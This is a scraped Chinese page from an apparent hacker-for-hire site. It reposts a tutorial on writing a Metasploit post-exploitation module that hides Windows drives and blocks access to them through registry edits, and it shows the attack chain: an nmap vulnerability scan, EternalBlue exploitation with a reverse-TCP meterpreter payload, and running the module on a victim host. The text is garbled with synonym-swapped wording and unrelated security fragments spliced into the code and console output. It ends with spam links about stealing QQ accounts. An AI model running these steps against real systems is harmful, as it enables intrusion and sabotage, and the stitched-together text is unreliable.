电脑软件:关于Metasploit5中的后浸透模块的编写与测验

访客4年前关于黑客接单1045

后浸透模块,望文生义是在成功浸透政策主机之后进行操作的模块,这类模块可以抵达某种或某些特定的目的。在Metasploit中,模块是后缀名为.rb的文件,它是运用Ruby编写的程序。本文具体描述了怎样运用Ruby编写躲藏和制止访问特定驱动器的后浸透模块、怎样在Metasploit中加载该后浸透模块以及怎样在meterpreter中运用该后浸透模块的进程。

实验环境
1.浸透主机:Kali-Linux-2019.1-vm-amd642.政策主机:Windows Server 2008 R23.软件版别:Metasploit v5.0.2
编写后浸透模块

1.模块的榜首部分如下所示:

# This module requires Metasploit: https://metasploit.com/download# This module is used to hide and restrict access to a particular drive# after you have successfully penetrated a serverrequire 'rex'require 'msf/core'require 'msf/core/post/windows/registry'class MetasploitModule < Msf::Post  include Msf::Post::Windows::Registry  def initialize   super(  'Description'=> 'This module is used to hide and restrict access to a particular drive',  'License'=> MSF_LICENSE,  'Author'=> 'Neroqi',   )  register_options(    [ OptString.new('DriveCharacter', [true,'Please SET the Drive Character'])],       self.class)  end

Metasploit的模块编写建议从注释初步,注释句子以“#”最初,注释可以增强模块的可读性,便利他人和自己往后的阅览运用。

require ‘rex’引入了Metasploit中rex库的全部内容;require ‘msf/core’引入了Metasploit中core库的全部内容;require ‘msf/core/post/windows/registry’引入了registry.rb库文件,用于后续操作政策主机的注册表。

class MetasploitModule < Msf::Post表明将该模块界说为Post类型,即后浸透模块类型。

办法initialize界说了模块的相关信息及参数,其间register_options运用OptString.new函数界说了一个字符串变量DriveCharacter,用于存储盘符。

2.模块的第二部分如下所示:

  def drive_converter(drive)case drivewhen "A"  return 1when "B"  return 2when "C"  return 4when "D"  return 8when "E"  return 16when "F"  return 32when "G"  return 64end  end

这一部分涉及到盘符掩码的核算进程。其实很简单,运用公式2^(N-1)即通过运用微软注册表服务器(regsvr32)获取反向Shell;可,其间N为盘符字母在26个英文字母表中的方位,比方C在字母表中的方位为3,if (SUCCEEDED(hr))因而回来2^(3-1)=4,其他盘符以此类推。

因为服务器或许外挂存储阵列,因而盘符或许不止到字母“G” ,这一部分可以自行批改。

3.模块的第三部分如下所示:

  def run drive_int = drive_converter(datastore['DriveCharacter'])registry_path = "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"exists = meterpreter_registry_key_exist?(registry_path)if exists print_good("Registry Path Exists, Creating Values Directly!")meterpreter_registry_setvaldata(registry_path, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Hiding #{datastore['DriveCharacter']} Drive")meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Restricting Access to #{datastore['DriveCharacter']} Drive")else print_error("Registry Path Doesn't Exist, Creating Path Firstly!")registry_createkey(registry_path)meterpreter_registry_setvaldata(registry_path,'NoDrives', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Hiding #{datastore['DriveCharacter']} Drive")meterpreter_registry_setvaldata(registry_path,'NoViewOnDrive', drive_int.to_s,'REG_DWORD', REGISTRY_VIEW_64_BIT)print_good("Restricting Access to #{datastore['DriveCharacter']} Drive")        end     print_good("Disabled #{datastore['DriveCharacter']} Drive Successfully!")  end
registry_path = "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"

此处的HKLM表明注册表中的HKEY_LOCAL_MACHINE,可是这样简写是否可行?Windows Server 2008 R2的注册表是下面这样的啊。

莫慌,途径补全的作业现已有人悄悄帮我们做了,在registry.rb库文件中有一段代码完结了这项作业,具体如下:

  def registry_hive_lookup(hive)    case hive    when 'HKCR'      HKEY_LOCAL_MACHINE    when 'HKCU'      HKEY_CURRENT_USER    when 'HKLM'      HKEY_LOCAL_MACHINE    when 'HKU'      HKEY_USERS    when 'HKPD'      HKEY_PERFORMANCE_DATA    when 'HKCC'      HKEY_CURRENT_CONFIG    when 'HKDD'      HKEY_DYN_DATA    else      HKEY_LOCAL_MACHINE    end  end
registry_path = "HKLMSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"

此处是在注册表的HKLM(HKEY_LOCAL_MACHINE)中,这儿的HKLM也可以批改为HKCU(HKEY_CURRENT_USER)。这两者的差异在于:在成功浸透政策主机之后,若可以获得政策主机的system权限,那么就可以运用HKLM批改系统等级的注册表;若只能获得某一用户的权限,那么退而求其次,运用HKCU批改当时用户的注册表。

exists = meterpreter_registry_key_exist?(registry_path)

用于判别政策主机的注册表中是否存在该途径,为下面的if-else句子供应判别依据。

在Windows中通过创立NoDrives和NoViewOnDrive这两个注册表值,可以完结躲藏并制止访问指定盘符。

我们的预期是在meterpreter会话中运用该后浸透模块,所以运用函数meterpreter_registry_setvaldata来设置NoDrives和NoViewOnDrive的值。因为政策主机是64位系统,所以在meterpreter_registry_setvaldata函数中运用的是参数REGISTRY_VIEW_64_BIT;假设政策主机是32位系统,那么运用参数REGISTRY_VIEW_32_BIT。

检验后浸透模块

通过上面的进程,后浸透模块的编写现已完结,接下来进行模块的检验。

1.将编写好的后浸透模块disable_drive_Neroqi.rb拷贝到如下途径:

/usr/share/metasploit-framework/modules/post/windows/manage

要将模块成功加载到Metasploit中,还需求在msfconsole中reload_all。若模块存在过错,那么msfconsole会回来具体的报错信息,然后依据报错信息相应地去批改自己的代码即可;若模块正确无误,则msfconsole的回来信息如下图所示(reload_all之前是326个post模块,之后是327个post模块):

2.运用nmap扫描政策主机,nmap指令如下:

root@kali:~# nmap -sV -p - --script vuln --script-args unsafe 192.168.110.130

发现政策主机中存在ms17_010的缝隙,扫描成果如下图所示:

3.为进一步承认政策主机中的ms17_010缝隙,避免nmap误报,我们在msfconsole中运用auxiliary/scanner/ *** b/ *** b_ms17_010模块,承认ms17_010缝隙是否可以运用,操作如下:

msf5 > use auxiliary/scanner/ *** b/ *** b_ms17_010 msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > set RHOSTS 192.168.110.130RHOSTS => 192.168.110.130msf5 auxiliary(scanner/ *** b/ *** b_ms17_010) > run

底子承认该ms17_010缝隙可以运用,承认成果如下图所示:

4.运用exploit/windows/ *** b/ms17_010_eternalblue模块对政策主机进行浸透,树立与政策主机之间的meterpreter会话,操作如下:

msf5 > use exploit/windows/ *** b/ms17_010_eternalbluemsf5 exploit(windows/ *** b/ms17_010_eternalblue) > set RHOST 192.168.110.130RHOST => 192.168.110.132msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LHOST 192.168.110.132LHOST => 192.168.110.130msf5 exploit(windows/ *** b/ms17_010_eternalblue) > set LPORT 8000LPORT => 8000msf5 exploit(windows/ *** b/ms17_010_eternalblue) > run

5.可以看到我们获得了政策主机的system权限,如下图所示:

6.关于情况不知道的政策主机,可以运用post/windows/gather/forensics/enum_drives模块来枚举分区信息,为后续实行disable_drive_Neroqi.rb模块供应依据,在实行enum_drives模块之前,需求通过background将meterpreter会话转为后台运转,具体操作如下:

meterpreter > background[*] Backgrounding session 1...msf5 > sessionsActive sessions===============  Id  Name  Type                     Information                            Connection  --  ----  ----                     -----------                            ----------  1         meterpreter x64/windows  NT AUTHORITYSYSTEM @ WIN-3E5KJEFP436  192.168.110.132:8000 -> 192.168.110.130:49280 (192.168.110.130)msf5 > use post/windows/gather/forensics/enum_drives msf5 post(windows/gather/forensics/enum_drives) > show optionsModule options (post/windows/gather/forensics/enum_drives):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   MA其一就是运用白名单,可是关于嵌入的签名的带参数可实行文件要非常留神了。例如许多微软数字签名东西就可以拿来作为其他内容的跳板,由所以微软的签名,或许你现在对那些签名是信认的不能再信任了。XDRIVES  10               no        Maximum physical drive number   SESSION                     yes       The session to run this module on.msf5 post(windows/gather/forensics/enum_drives) > set SESSION 1SESSION => 1msf5 post(windows/ga以上是物联网摄像头最常见的安全问题。但假设是内置的 *** 摄像头,那么更或许的解说是侵犯者通过Meterpreter payload入侵并控制了它。运用Meterpreter侵犯者可以获取到一个反向shell,这也是本文行将谈论的内容。有关Meterpreter的更多信息,请参阅:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/ther/forensics/enum_drives) > runDevice Name:                    Type:   Size (bytes):------------                    -----   -------------.PhysicalDrive0                   4702111234474983745.C:                               4702111234474983745.D:                               4702111234474983745.E:                               4702111234474983745[*]$> cd shadow-box-for-x86 Post module execution completed

7.在msf中挑选编写的后浸透模块disable_drive_Neroqi.rb,设置DriveCharacter和SESSION,其间DriveCharacter为盘符字母(此处设为D),SESSION为转为后台运转的meterpreter会话id(此处id为1),操作如下:

msf5 > use post/windows/manage/disable_drive_Neroqi msf5 post(windows/manage/disable_drive_Neroqi) > set DriveCharacter DDriveCharacter => Dmsf5 post(windows/manage/disable_drive_Neroqi) > set SESSION 1SESSION => 1msf5 post(windows/manage/disable_drive_Neroqi) > run

8.在设置好模块disable_drive_Neroqi的参数之后,run这个后浸透模块,输出信息如下: 

9.登录到政策主机中,验证侵犯是否成功,主机的注册表如下图所示,此刻在注册表中NoDrives和NoViewOnDrive现已成功写入:

翻开“我的电脑”,可以看到D盘现已消失,如下图所示:

在“磁盘处理”中检验翻开D盘,系统报错,无法访问D盘,如下图所示:

结束语

以上这些,就是关于怎样运用Ruby编写后浸透模块、怎样加载以及运用后浸透模块的进程,我们有爱好的话,可以检验运用Ruby编写自己的浸透模块而且进行相关检验。

*本文原创作者:Neroqi,本文归于FreeBuf原创奖赏方案,未经许可制止转载

电脑软件:关于Metasploit5中的后浸透模块的编写与测验

set ZTVZ=wEbc// System.out.println("Total " + String.valueOf(countIds) + " classes(自界说类)n"); tab_test[TST_GETSCHED].func = checksched_getscheduler;关于Metasploit5中的后渗透模块的编写与测试

电脑软件我们好,上一篇文章小弟宣告/解了一个简略的pwn,剩下的2个level也现已有小伙伴协助解题了,感觉我们好像都挺喜欢该类型的。这次小弟方案初步写一个新的系列文章,假设写的欠好,或许有什么定见、建议欢迎各位大佬点评。本篇文章为入门篇故仅供应了8个level的栈溢出练习实验,均未打开任何保护的。后边的文章会进一步晋级。自2003年来,以SQL蠕虫、“尼姆达”、“冲击波”、“震荡波”、“熊猫烧香”、“永久之蓝”等病毒的连续性爆发为起点,到核算机文件泄露、口令泄露、硬件资产丢掉、服务器系统瘫痪等许多终端安全工作在各地 *** 一再发生,使 *** 机关、企事业单位、动力领域和其他工业领域的 *** 处理人员头痛不已。17年某动力企业大面积感染勒索病毒更是加快了职业界工控安全整体 *** 的脚步,怎样对主机终端的进行更好的安全防护一向是我们考虑的问题。if [ -f ~/.pip/pip.conf ];

vim.tiny /etc/shadow用户为:80/tcp open http Apache httpd 2.4.18 ((Ubuntu))这两款设备都运用Electra jailbreak 1.0.4进行了越狱。电脑软件

mpenginel 情报数据分析发现,在7月 23日至31日运用过相关Xshell等产品的用户信息 极有或许已被侵犯者盗取,因为其他时间段内C&C无任何DNS解析,且NS服务器指向正常,信息被盗取的或许性较小,但不打扫侵犯者在后续进程中再次批改配备实施侵犯。5.Socket,又称为“套接字”,运用程序可以通过“套接字”向 *** 宣告央求或许应对 *** 央求。Socket对TCP/TP协议进行封装,是一个通讯链的句柄。扫描 *** 中数据存储服务,运用Socket编程接口,获取 *** 字符输出流,进行指纹辨认作业。下面是我写的一个比方。 3.3 代码注入进程

[1][2][3][4][5][6][7]黑客接单网

Linux服务器版别:RedHat Linux AS 2.1

用户在运用Exchange服务时,电子邮件客户端会依据服务器要求的安全等级进行验证客户端系统的安全性设置是否满足服务器的要求,假设满足服务器要求的安全等级则容许进行收发邮件,否则将无法继续与服务器进行通讯。关于Metasploit5中的后渗透模块的编写与测试

电脑软件现有智能硬件的安全策略因为要下降关于服务端的功用损耗,许多情况下是把安全的过规则安置在客户端,没有对全部客户端输入数据的输入检查和标准化。运用正则表达式和其他机制来保证只需容许的数据能进入客户端运用程序。在规划时并没有完结让移动端和服务端支撑的一套一同的安全需求,可以通过将数据参数直接提交至云端,客户端APK 对参数过滤的束缚,抵达破解设备功用的目的。触及的指令和控制服务器假设SAML照应消息短少相应的保护机制,则侵犯者可以通过篡改照应数据假充他人身份。例如,我以Tim的身份登录IdP然后通过简略地批改SAML照应消息声称自己是Emmanuel。实事上,我可以编造整个照应消息,然后假充Emmanuel的身份。

[2]依据内部挟制的政策可以将现有挟制大致分为系统损坏、信息盗取与内部欺诈三个底子类型,实践中还存在两种之上的混合挟制;检查某服务发起权限

-- *** 存储

电脑软件

设备证书

回到Apple Pay上,Apple Pay可以做到离线支付,那是不是银行卡被拷贝到了苹果手机中呢?并没有,Apple Pay的绑定银行卡进程,不是把银行卡芯片中的密钥和数据直接拷贝到手机上,实际上是把卡号和相关的暗码或许信用卡的CVV输入到手机运用里,然后Apple Pay和银联的服务器做一次设备认证绑定。这个设备认证的进程Apple Pay会生成一个仅有的设备账号与之对应,设备认证绑定后,往后要和POS机进行安全认证的数据Token等存储在iphone安全芯片中。

前史关于Metasploit5中的后渗透模块的编写与测试

pmuflags=1 禁定看门狗定时器python 512线程直扫上行带宽约几百KB/s;直接上masscan、zmap这等扫描软件上行流量会暴走;具体要多少时间,可以拿少量数据检验算算!2.1 运用python运用python直接将IP按组遍历进队伍,运用多线程循环扫描(也就是直接检验登录),速度比较慢,但准确率相对较高

然后我们就可以运用这些SID来拒绝RDP和其他 *** 访问本地帐户。
本文标题:电脑软件:关于Metasploit5中的后浸透模块的编写与测验

相关文章

想开一家汉堡店如何寻找加盟公司?加盟的渠道在这里

想开一家汉堡店如何寻找加盟公司?加盟的渠道在这里

如今,越来越多的人都但愿通过创业来改变本身的收入和糊口,而汉堡店就是许多人的选择。对付一些投资小白来说,各人城市选择加盟的方法来开一家汉堡店,因为加盟要比本身做省心多了,并且还不消包袱太大的投资风险,...

南京鼓楼区质量超好的奢华spa会所地址在哪儿?极致享受帝王体验

今天为大家介绍,快速在线预约南京鼓楼区质量超好的奢华spa会所地址在哪儿?极致享受帝王体验微信号和联系方式相关资讯。通过模特经纪人qq可以快速的找到需要的北京高端模特QQ号,从而进行下一步的判断和添加...

酒店黑客,微信黑客软件哪个好,电脑被黑客改密码了咋办

还没来得及看315晚会的同学能够看今日早上新闻播报的“简版”附录4、关于360天擎终端安全呼应体系先从一个很简略的apk包下手,一个假登录页面: blx r3cs=001b ss=0023 ds...

顶级预约

变成得了,不必澎涨自身;败了失了,不必折磨自己。顶尖模特预约,大部分艰难全是想像出去的,行動以前都会瞻前顾后。是我个好方法:先把自己发布去再聊。 女学妹春雪简单自我介绍 先生们,我的名字叫春雪,是一个...

一般找黑客盗一个QQ号多少钱(黑客怎么盗qq号)

正义网漳州市10月17号来电(报道员江云聪 梅寒丹 欧新蕊)五名不上二十岁的小伙子无所作为,假冒网络黑客,以帮人盗取QQ号之名行行骗之实。前不久,福建龙海市人民检察院以涉嫌犯罪罪批捕周某、黄某青、张某...

2021年挣钱好项目(一天挣300-500的方法)

  2021年挣钱好项目(一天挣300-500的方式)   年末的情况下,大伙儿都是在等待年终奖金,盆友细毛却被公司通知:“你被开除了。”   实际上她早就在上年就发觉了眉目:   春节休假完毕后,回...